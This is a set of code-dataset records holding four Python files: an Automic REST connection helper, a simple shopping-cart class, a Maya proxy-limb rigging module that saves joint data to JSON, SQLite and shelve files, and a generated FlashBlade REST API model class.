urlparse(self.baseurl).netloc \r\n self.basepath = '/api/v1'\r\n self.url = self.baseurl+'/ae'+self.basepath \r\n if self.noproxy: \r\n os.environ['NO_PROXY'] = self.domain \r\n \r\n self.init() \r\n \r\n def init(self): \r\n #global _userid, _password\r\n global _auth, _url, _sslverify, _timeout, _baseurl\r\n #_userid = self.userid \r\n #_password = self.password \r\n _auth = self.auth\r\n _url = self.url \r\n _sslverify = self.sslverify\r\n _timeout = self.timeout\r\n _baseurl = self.baseurl \r\n #_cert = self.cert\r\n if self.sslverify == True:\r\n _sslverify = self.cert\r\n else:\r\n _sslverify = self.sslverify\r\n \r\nclass config(object): \r\n def __init__(self): \r\n self.url = _url \r\n self.base64auth = _auth\r\n #self.userid = _userid \r\n #self.password = _password \r\n self.sslverify = _sslverify\r\n self.timeout = _timeout\r\n\r\n def setArgs(self, path, args):\r\n for key, value in args.items():\r\n if key != 'self':\r\n path = path.replace('{'+key+'}', str(value))\r\n return path\r\n\r\n","sub_path":"automic_rest/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"189879641","text":"\nclass ShoppingCart:\n # write your code here\n def __init__(self, total=0, employee_discount=None, items=[]):\n self.total = total\n self.employee_discount = employee_discount\n self.items = items\n self.total_spent = sum([i['price']*i['quantity'] for i in items])\n# self.discount_item = discount_item\n# self.discount_price = sum([i['price'] for i in items])\n def add_item(self, name=None, price=None, quantity=1):\n if quantity == 1:\n self.items.append({'name': name, 'price': price})\n else:\n for i in range(0, quantity):\n self.items.append({'name': name, 'price': price})\n self.total_spent += price * quantity\n return self.total_spent\n def mean_item_price(self):\n x = [p['price'] for p in self.items] \n x.sort()\n mean = sum(x) / len(x)\n return mean\n\n def median_item_price(self):\n x = [p['price'] for p in self.items] \n x.sort()\n half = len(x)//2\n b = x[half]\n c = x[-half-1]\n median = (b + c) / 2\n return median\n\n def apply_discount(self):\n x = [p['price'] for p in self.items] \n discount = sum(x) * .8\n if discount != 0:\n return discount\n else:\n return \"sorry\"\n def void_last_item(self):\n pass\n def remove_item(self,list,index):\n return list.pop(index)\n \n ","sub_path":"shopping_cart.py","file_name":"shopping_cart.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"274062604","text":"''' Proxy limb serialization/creation module '''\n# Python standard libraries\nimport os\nimport sqlite3\nimport json\nimport shelve\n\n# Maya libraries\nimport pymel.core as pm\n\n# Other libraries\nimport python.general.pyUtils as pyUtils\nimport python.maya.rig.rigUtils as rigUtils\nimport python.maya.general.mayaNaming as mayaNaming\nimport python.maya.rig.modules.modRigUtils as modRigUtils\n\nRESOURCE_DIR = r'C:\\Users\\pkatzen\\Documents\\pk_dev01\\Python\\Maya\\Rigging\\Modular\\Resources'\n\n\nclass ProxyLimb(pyUtils.Printer, object):\n ''' Proxy limb base class '''\n _limbInfo = {'spine': ('xyz', 'zdown', 0.25),\n 'neck': ('xyz', 'zdown', 0.25),\n 'pelvis': ('xyz', 'zdown', 0.25),\n 'L_arm': ('xyz', 'yup', 0.25),\n 'R_arm': ('xyz', 'yup', 0.25),\n 'L_leg': ('xzy', 'xdown', 0.25),\n 'R_leg': ('xzy', 'xdown', 0.25),\n 'L_clavicle': ('xyz', 'yup', 0.25),\n 'R_clavicle': ('xyz', 'yup', 0.25),\n 'L_scapula': ('xyz', 'zdown', 0.25),\n 'R_scapula': ('xyz', 'zdown', 0.25),\n 'L_inverseFoot': ('xzy', 'xdown', 0.25),\n 'R_inverseFoot': ('xzy', 'xdown', 0.25),\n 'L_thumb': ('xyz', 'yup', 0.125),\n 'L_index': ('xyz', 'yup', 0.125),\n 'L_middle': ('xyz', 'yup', 0.125),\n 'L_ring': ('xyz', 'yup', 0.125),\n 'L_pinky': ('xyz', 'yup', 0.125),\n 'R_thumb': ('xyz', 'yup', 0.125),\n 'R_index': ('xyz', 'yup', 0.125),\n 'R_middle': ('xyz', 'yup', 0.125),\n 'R_ring': ('xyz', 'yup', 0.125),\n 'R_pinky': ('xyz', 'yup', 0.125),\n 'finger': ('xyz', 'yup', 0.125),\n 'toe': ('xyz', 'yup', 0.125),\n 'head': ('xyz', 'zdown', 0.25),\n 'lwrJaw': ('xyz', 'ydown', 0.25),\n 'eye': ('xyz', 'yup', 0.125)}\n # Joint orientation vectors\n _axisVectors = {'x': (1.00, 0.00, 0.00),\n 'y': (0.00, 1.00, 0.00),\n 'z': (0.00, 0.00, 1.00)}\n _upDown = {'up': '+', 'down': '-'}\n _worldAlignVectors = {'xup': (1.00, 0.00, 0.00), 'xdown': (-1.00, 0.00, 0.00),\n 'yup': (0.00, 1.00, 0.00), 'ydown': (0.00, -1.00, 0.00),\n 'zup': (0.00, 0.00, 1.00), 'zdown': (0.00, 0.00, -1.00)}\n _resourceDir = RESOURCE_DIR\n _jsonFile = os.path.join(_resourceDir, 'proxyLimbs.json')\n _dbFile = os.path.join(_resourceDir, 'proxyLimbs.db')\n _shelveFile = os.path.join(_resourceDir, 'proxyLimbs')\n\n def registerLimb(self, limbName, ojString, saoString, radius):\n '''\n Registers a new limb\n\n Parameters\n ----------\n limbName : string\n Name of the limb\n ojString : {'xyz', 'yzx', 'zxy', 'zyx', 'yxz', 'xzy', 'none'}\n Orient joint string\n saoString : {'xup', 'xdown', 'yup', 'ydown', 'zup', 'zdown', 'none'}\n Secondary axis orientation string\n radius : float\n Joint radius value\n '''\n if limbName not in self._limbInfo.keys():\n self._limbInfo[limbName] = (ojString, saoString, radius)\n else:\n raise KeyError('Key: \"%s\" already exists' % limbName)\n\n def updateLimb(self, limbName, ojString, saoString, radius):\n '''\n Updates Limb information\n\n Parameters\n ----------\n limbName : string\n Name of the limb\n ojString : {'xyz', 'yzx', 'zxy', 'zyx', 'yxz', 'xzy', 'none'}\n Orient joint string\n saoString : {'xup', 'xdown', 'yup', 'ydown', 'zup', 'zdown', 'none'}\n Secondary axis orientation string\n radius : float\n Joint radius value\n '''\n if limbName in self._limbInfo.keys():\n self._limbInfo[limbName] = (ojString, saoString, radius)\n else:\n raise KeyError('Invalid key: \"%s\"' % limbName)\n\n def getLimbInfo(self, limbName):\n '''\n Returns information about a limb\n\n Parameters\n ----------\n limbName : string\n Nmae of the limb\n\n Returns\n -------\n tuple :\n (ojString, saoString, radius)\n '''\n if limbName in self._limbInfo.keys():\n return self._limbInfo[limbName]\n\n def writeLimb(self):\n raise NotImplementedError('Undefined method: writeLimb()')\n\n def buildLimb(self):\n raise NotImplementedError('Undefined method: buildLimb()')\n\n\nclass LimbRecord(object):\n ''' ProxyLimb record class '''\n def __init__(self, name, oj, sao, radius, jointInfo):\n self.name = name\n self.oj = oj\n self.sao = sao\n self.radius = radius\n self.jointInfo = jointInfo\n\n\nclass LimbWriter(ProxyLimb):\n ''' ProxyLimb writer class '''\n def toJson(self):\n ''' Writes limb information to a JSON file '''\n ProxyLimbs = {}\n for key in sorted(self._limbInfo):\n oj, sao, radius = self._limbInfo[key]\n # Get limb orientation, radius information\n ProxyLimbs[key] = {'oj': oj, 'sao': sao,\n 'radius': radius, 'joints': {}}\n # Get limb joint names\n joints = pm.ls('*%s*' % key, type=pm.nt.Joint)\n names = [each.nodeName().replace('_jnt', '') for each in joints]\n # Get limb joint positions as tuple\n positions = [tuple(each.getTranslation('world')) for each in joints]\n ProxyLimbs[key]['joints'] = dict(zip(names, positions))\n # Write proxyLimbs.json file\n with open(self._jsonFile, 'w') as outfile:\n json.dump(ProxyLimbs, outfile, indent=4, separators=(',', ':'))\n\n def toDatabase(self):\n ''' Writes limb information to a database '''\n conn = sqlite3.connect(self._dbFile)\n conn.execute('PRAGMA foreign_keys=ON')\n cursor = conn.cursor(pyUtils.MyCursor)\n # Create ProxyLimb table\n cursor.createTable('ProxyLimbs',\n ('limbId', 'INTEGER PRIMARY KEY AUTOINCREMENT'),\n ('limbType', 'TEXT'),\n ('oj', 'TEXT'),\n ('sao', 'TEXT'),\n ('radius', 'REAL'))\n # Create ProxyLimbJoints table\n cursor.createTable('ProxyLimbJoints',\n ('limbId', 'INTEGER'),\n ('jointId', 'INTEGER PRIMARY KEY AUTOINCREMENT'),\n ('jointName', 'TEXT'),\n ('translation', 'TEXT'),\n ('rotation', 'TEXT'),\n ('FOREIGN KEY',\n '(limbId) REFERENCES ProxyLimbs (limbId)'))\n # Populate ProxyLimbs table\n for key, value in sorted(self._limbInfo.items()):\n cursor.insert('ProxyLimbs', limbId=None, limbType=key,\n oj=value[0], sao=value[1], radius=value[2])\n # Populate ProxyLimbJoints table\n for key in self._limbInfo:\n joints = pm.ls('*%s*' % key, type=pm.nt.Joint)\n for jnt in joints:\n jntName = jnt.nodeName().replace('_jnt', '')\n pos = str(jnt.getTranslation('world'))\n rot = str(jnt.getRotation('world'))\n cursor.execute(''' INSERT INTO ProxyLimbJoints\n (limbId, jointName, translation, rotation)\n VALUES ((SELECT limbId from ProxyLimbs\n WHERE limbType = \"%s\"), \"%s\", \"%s\", \"%s\"); '''\n % (key, jntName, pos, rot))\n conn.commit()\n conn.close()\n\n def toShelve(self):\n ''' Writes limb information to a shelve '''\n outFile = shelve.open(self._shelveFile)\n for limbName, info in self._limbInfo.items():\n jointInfo = {}\n joints = pm.ls('*%s*' % limbName, type=pm.nt.Joint)\n for j in joints:\n jntName = j.nodeName()\n jointInfo[jntName] = j.getTranslation('world')\n oj, sao, radius = info\n limbRec = LimbRecord(limbName, oj, sao, radius, jointInfo)\n outFile[limbName] = limbRec\n outFile.close()\n\n def writeLimb(self, fileType='json'):\n ''' Writes limb information out to the specified data structure '''\n if fileType == 'json':\n self.toJson()\n elif fileType == 'db':\n self.toDatabase()\n elif fileType == 'shelve':\n self.toShelve()\n else:\n raise ValueError('Invalid file type: \"%s\"' % fileType)\n\n\nclass LimbBuilder(ProxyLimb):\n ''' Proxy limb creation class '''\n _limbCounter = {}\n\n def __init__(self, limbType):\n '''\n Constructor method\n\n Parameters\n ----------\n limbType : string\n Type of limb\n '''\n try:\n self._limbInfo[limbType]\n except KeyError:\n raise KeyError('Invalid limb type (\"%s\")' % limbType)\n # General limb data\n self.limbType = limbType\n self._increaseLimbCount(self.limbType)\n self.limbId = chr(self._limbCounter[self.limbType])\n self.oj = None\n self.sao = None\n self.radius = None\n self.jointInfo = None\n # Naming Convention object\n self.nameObj = mayaNaming.NodeName()\n\n @classmethod\n def _increaseLimbCount(cls, limbType):\n '''\n Increments the number of limbs created for each limb type\n\n Parameters\n ----------\n limbType : string\n Limb type to keep count of\n '''\n try:\n cls._limbCounter[limbType] += 1\n except:\n cls._limbCounter[limbType] = 65\n\n @classmethod\n def _resetLimbCount(cls, limbType):\n '''\n Resets the limb counter on a per limb basis\n\n Parmaeters\n ----------\n limbType : string\n Limb type to reset the counter for\n '''\n try:\n cls._limbCounter[limbType] = 65\n except:\n pass\n\n def readJson(self, fileName=None):\n '''\n Gets proxy limb information from a JSON file\n\n Parameters\n ----------\n fileName : {string, None}, optional\n Name of file to read from. If None, self._jsonFile will be used\n '''\n if not fileName:\n fileName = self._jsonFile\n with open(fileName, 'r') as plFile:\n proxyLimb = json.load(plFile)\n # Update member data\n self.oj = proxyLimb[self.limbType]['oj']\n self.sao = proxyLimb[self.limbType]['sao']\n self.radius = proxyLimb[self.limbType]['radius']\n self.jointInfo = proxyLimb[self.limbType]['joints']\n\n def readDatabase(self, fileName=None, autoClose=True):\n '''\n Gets proxy limb information from a database\n\n Parameters\n ----------\n fileName : {string, None}, optional\n Name of file to read from. If None, self._dbFile will be used\n autoClose : bool, optional\n Option to auto close the connection to the database when operation is finished\n '''\n if not fileName:\n fileName = self._dbFile\n # Get joint information from the database\n query = ('''\n SELECT pj.jointName, pj.translation\n FROM ProxyLimbJoints pj\n INNER JOIN ProxyLimbs pl ON pj.limbId = pl.limbId\n WHERE pl.limbType = \"%s\";\n ''' % self.limbType)\n conn = sqlite3.connect(fileName)\n cur = conn.cursor()\n # Get joint names and positions from the database\n self.jointInfo = {}\n for row in cur.execute(query):\n jointName = row[0]\n position = eval(row[1])\n self.jointInfo[jointName] = position\n # Get joint configuration from the database\n for row in cur.execute('''\n SELECT oj, sao, radius FROM ProxyLimbs\n WHERE limbType = \"%s\"\n ''' % self.limbType):\n self.oj, self.sao, self.radius = row\n # Close database connection\n if autoClose:\n conn.close()\n\n def readShelve(self, fileName=None):\n '''\n Gets proxy limb information from a shelve file\n\n Parameters\n ----------\n fileName : {string, None}, optional\n Name of file to read from. If None, self._shelveFile will be used\n '''\n if not fileName:\n fileName = self._shelveFile\n openShelve = shelve.open(fileName, 'r')\n limbObj = openShelve[self.limbType]\n self.oj = limbObj.oj\n self.sao = limbObj.sao\n self.radius = limbObj.radius\n self.jointInfo = limbObj.joints\n openShelve.close()\n\n def buildLimb(self, readFrom='json'):\n '''\n Builds a proxy limb\n\n Parameters\n ----------\n readFrom : {'json', 'db', 'shelve'}, optional\n File type to read information from\n Returns\n -------\n list :\n Newly created Nodes\n '''\n # Get joint information\n if readFrom == 'json':\n self.readJson()\n elif readFrom == 'db':\n self.readDatabase()\n else:\n self.readShelve()\n # Create naming conventions\n curveTag = self.nameObj.nodeTags['curve']\n polyTag = self.nameObj.nodeTags['polygon']\n locatorTag = self.nameObj.nodeTags['locator']\n ddmTag = self.nameObj.nodeTags['distanceDimension']\n # Draw the joints\n proxyJoints = []\n for name, pos in sorted(self.jointInfo.items()):\n jntName = self.nameObj.taggedName(name, 'proxyJoint')\n jntName += self.limbId\n newJnt = pm.joint(n=jntName)\n newJnt.setTranslation(pos, 'world')\n proxyJoints.append(newJnt)\n newJnt.setAttr('radius', 0.35)\n # Orient the joints\n worldAxisDirection = self._upDown[self.sao[1:]]\n rigUtils.orientJoints(proxyJoints, self.oj[0], '+',\n self.oj[1], self.sao[0], worldAxisDirection)\n # Create top node\n topNodeName = self.nameObj.taggedName(self.limbType, curveTag)\n topNodeName += self.limbId\n topNode = modRigUtils.Curves().drawCurve('serratedCircle', topNodeName,\n 0.25)\n topNode.getShape().setAttr('overrideEnabled', True)\n topNode.getShape().setAttr('overrideColor', 14)\n rigUtils.matchTransforms(topNode, proxyJoints[0])\n # Create the locator -> joint -> cube hierarchy\n locators = []\n cubes = []\n for i, jnt in enumerate(proxyJoints):\n # Node names\n descriptor = self.nameObj.splitName(jnt.nodeName())['descriptors']\n descriptor = self.nameObj._delimiter.join(descriptor)\n locName = self.nameObj.taggedName(descriptor, locatorTag)\n locName += self.limbId\n cubeName = self.nameObj.taggedName(descriptor, polyTag)\n cubeName += self.limbId\n # Create the locator\n loc = pm.spaceLocator(n=locName)\n loc.setAttr('localScale', (1.250, 1.250, 1.250))\n loc.getShape().setAttr('overrideEnabled', True)\n loc.getShape().setAttr('overrideColor', 16)\n locators.append(loc)\n loc.setParent(topNode)\n rigUtils.matchTransforms(loc, jnt)\n jnt.setParent(loc)\n # Create cubes\n if jnt is not proxyJoints[-1]: \n cube = pm.polyCube(n=cubeName, ch=False)[0]\n cubes.append(cube)\n pm.select('%s.vtx[:]' % cube.nodeName())\n pm.move(0.5, 0.0, 0.0, r=True, os=True)\n rigUtils.matchTransforms(cube, jnt)\n cube.setParent(jnt)\n cube.setScale([1.00, 0.175, 0.175])\n stretchNodes = []\n # Create stretchy behavior\n aim = self._axisVectors[self.oj[0]]\n worldUp = self._worldAlignVectors[self.sao]\n for i, loc in enumerate(locators):\n if loc is not locators[-1]:\n # Node names\n nodeName = loc.nodeName()\n descriptor = self.nameObj.splitName(nodeName)['descriptors']\n descriptor = self.nameObj._delimiter.join(descriptor)\n ddmName = self.nameObj.taggedName(descriptor, ddmTag)\n ddmName += self.limbId\n # Create measure nodes\n ddm = pm.distanceDimension(locators[i], locators[i + 1])\n ddm.getParent().rename(ddmName)\n ddm.getParent().setParent(topNode)\n ddm.getParent().setAttr('visibility', False)\n ddm.connectAttr('distance', '%s.scaleX' % cubes[i])\n stretchNodes.append(ddm.getParent())\n if i > 0:\n # Aim at child node\n pm.aimConstraint(loc, proxyJoints[i - 1], aimVector=aim,\n worldUpVector=worldUp, mo=True, w=1.00,\n skip='x')\n # Clean up\n lockOff = ['tx', 'ty', 'tz',\n 'rx', 'ry', 'rz',\n 'sx', 'sy', 'sz', 'visibility']\n for nodeList in [topNode, proxyJoints, locators, cubes, stretchNodes]:\n # lock attributes\n if nodeList not in [locators, topNode]:\n for n in nodeList:\n for attr in lockOff:\n pm.setAttr('%s.%s' % (n.nodeName(), attr), lock=True,\n k=False, cb=False)\n elif nodeList is locators:\n for n in nodeList:\n for attr in lockOff[3:]:\n pm.setAttr('%s.%s' % (n.nodeName(), attr), lock=True,\n k=False, cb=False)\n elif nodeList is topNode:\n for attr in lockOff[6:]:\n pm.setAttr('%s.%s' % (topNode.nodeName(), attr), lock=True,\n k=False, cb=False)\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"python/maya/rig/modules/ProxyLimbs.py","file_name":"ProxyLimbs.py","file_ext":"py","file_size_in_byte":18317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"158854440","text":"# coding: utf-8\n\n\"\"\"\n FlashBlade REST API\n\n A lightweight client for FlashBlade REST API 2.9, developed by Pure Storage, Inc. (http://www.purestorage.com/).\n\n OpenAPI spec version: 2.9\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re\n\nimport six\nimport typing\n\nfrom ....properties import Property\nif typing.TYPE_CHECKING:\n from pypureclient.flashblade.FB_2_9 import models\n\nclass ObjectStoreAccessPolicy(object):\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'name': 'str',\n 'id': 'str',\n 'enabled': 'bool',\n 'is_local': 'bool',\n 'location': 'FixedReference',\n 'policy_type': 'str',\n 'account': 'FixedReference',\n 'arn': 'str',\n 'created': 'int',\n 'description': 'str',\n 'rules': 'list[PolicyRuleObjectAccess]',\n 'updated': 'int'\n }\n\n attribute_map = {\n 'name': 'name',\n 'id': 'id',\n 'enabled': 'enabled',\n 'is_local': 'is_local',\n 'location': 'location',\n 'policy_type': 'policy_type',\n 'account': 'account',\n 'arn': 'arn',\n 'created': 'created',\n 'description': 'description',\n 'rules': 'rules',\n 'updated': 'updated'\n }\n\n required_args = {\n }\n\n def __init__(\n self,\n name=None, # type: str\n id=None, # type: str\n enabled=None, # type: bool\n is_local=None, # type: bool\n location=None, # type: models.FixedReference\n policy_type=None, # type: str\n account=None, # type: models.FixedReference\n arn=None, # type: str\n created=None, # type: int\n description=None, # type: str\n rules=None, # type: List[models.PolicyRuleObjectAccess]\n updated=None, # type: int\n ):\n \"\"\"\n Keyword args:\n name (str): Name of the object (e.g., a file system or snapshot).\n id (str): A non-modifiable, globally unique ID chosen by the system.\n enabled (bool): If `true`, the policy is enabled. If not specified, defaults to `true`.\n is_local (bool): Whether the policy is defined on the local array.\n location (FixedReference): Reference to the array where the policy is defined.\n policy_type (str): Type of the policy. Valid values are `nfs`, `object-access` and `snapshot`.\n account (FixedReference): Reference of the associated account. If the policy is not associated with an account, all fields in the reference possess `null` values.\n arn (str): Amazon Resource Name of the policy. Used when referencing the policy via S3 APIs.\n created (int): Creation timestamp of the object.\n description (str): A description of the policy, optionally specified when the policy is created. Cannot be modified for an existing policy.\n rules (list[PolicyRuleObjectAccess])\n updated (int): The last updated timestamp of the object.\n \"\"\"\n if name is not None:\n self.name = name\n if id is not None:\n self.id = id\n if enabled is not None:\n self.enabled = enabled\n if is_local is not None:\n self.is_local = is_local\n if location is not None:\n self.location = location\n if policy_type is not None:\n self.policy_type = policy_type\n if account is not None:\n self.account = account\n if arn is not None:\n self.arn = arn\n if created is not None:\n self.created = created\n if description is not None:\n self.description = description\n if rules is not None:\n self.rules = rules\n if updated is not None:\n self.updated = updated\n\n def __setattr__(self, key, value):\n if key not in self.attribute_map:\n raise KeyError(\"Invalid key `{}` for `ObjectStoreAccessPolicy`\".format(key))\n self.__dict__[key] = value\n\n def __getattribute__(self, item):\n value = object.__getattribute__(self, item)\n if isinstance(value, Property):\n return None\n else:\n return value\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n if hasattr(self, attr):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(ObjectStoreAccessPolicy, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ObjectStoreAccessPolicy):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"pypureclient/flashblade/FB_2_9/models/object_store_access_policy.py","file_name":"object_store_access_policy.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}